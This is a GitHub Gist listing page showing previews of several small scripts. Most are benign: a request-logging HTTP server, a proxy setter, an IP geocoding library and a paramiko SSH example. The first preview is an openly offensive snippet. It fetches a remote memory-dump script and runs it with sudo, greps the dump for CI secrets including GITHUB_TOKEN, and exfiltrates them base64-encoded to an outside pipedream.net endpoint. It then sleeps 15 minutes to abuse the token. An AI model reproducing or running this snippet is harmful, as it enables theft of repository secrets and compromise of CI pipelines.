This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Uses memory dump technique from github.com/nikitastupin/pwnhub / with regex to parse out all secret values (including GITHUB_TOKEN) | |
| B64_BLOB=`curl -sSf https://gist.githubusercontent.com/nikitastupin/30e525b776c409e03c2d6f328f254965/raw/memdump.py | sudo python3 | tr -d '\0' | grep -aoE '"[^"]+":\{"value":"[^"]*","isSecret":true\}' | sort -u | base64 -w 0 | base64 -w 0` | |
| # Print to run log | |
| echo $B64_BLOB | |
| # Exfil to Burp | |
| curl -s -d "$B64_BLOB" https://eonvxjpa2dhlojb.m.pipedream.net/token > /dev/null | |
| # Sleep for 15 mins to abuse GITHUB_TOKEN | |
| sleep 900 |
arunstar
/ server.py
Created
September 8, 2023 08:36
— forked from mdonkers/server.py
Simple Python 3 HTTP server for logging all GET and POST requests
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| """ | |
| License: MIT License | |
| Copyright (c) 2023 Miel Donkers | |
| Very simple HTTP server in python for logging requests | |
| Usage:: | |
| ./server.py [<port>] | |
| """ | |
| from http.server import BaseHTTPRequestHandler, HTTPServer |
arunstar
/ setproxy.py
Created
November 29, 2018 08:53
A python script that sets proxy in ubuntu environment
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import sys | |
| import re | |
| import fileinput | |
| if len(sys.argv) != 5 and len(sys.argv) != 3: | |
| print "Wrong command, sample commands: \n python setproxy.py server port username password \n OR \n python setproxy.py server port" | |
| else: | |
| proxy = sys.argv[1] | |
| port = sys.argv[2] |
arunstar
/ ipmapper.js
Created
December 12, 2017 04:36
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /*! | |
| * IP Address geocoding API for Google Maps | |
| * http://lab.abhinayrathore.com/ipmapper/ | |
| * Last Updated: June 13, 2012 | |
| */ | |
| var IPMapper = { | |
| map: null, | |
| mapTypeId: google.maps.MapTypeId.ROADMAP, | |
| latlngbound: null, | |
| infowindow: null, |
arunstar
/ example_paramiko_with_tty.py
Created
June 2, 2017 05:40
— forked from rtomaszewski/example_paramiko_with_tty.py
example paramiko script with interactive terminal
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import paramiko | |
| import time | |
| import re | |
| bastion_ip='ip' | |
| bastion_pass='pass' | |
| ssh = paramiko.SSHClient() | |
| ssh.set_missing_host_key_policy( paramiko.AutoAddPolicy() ) | |
| ssh.connect(bastion_ip, username='root', password=bastion_pass) |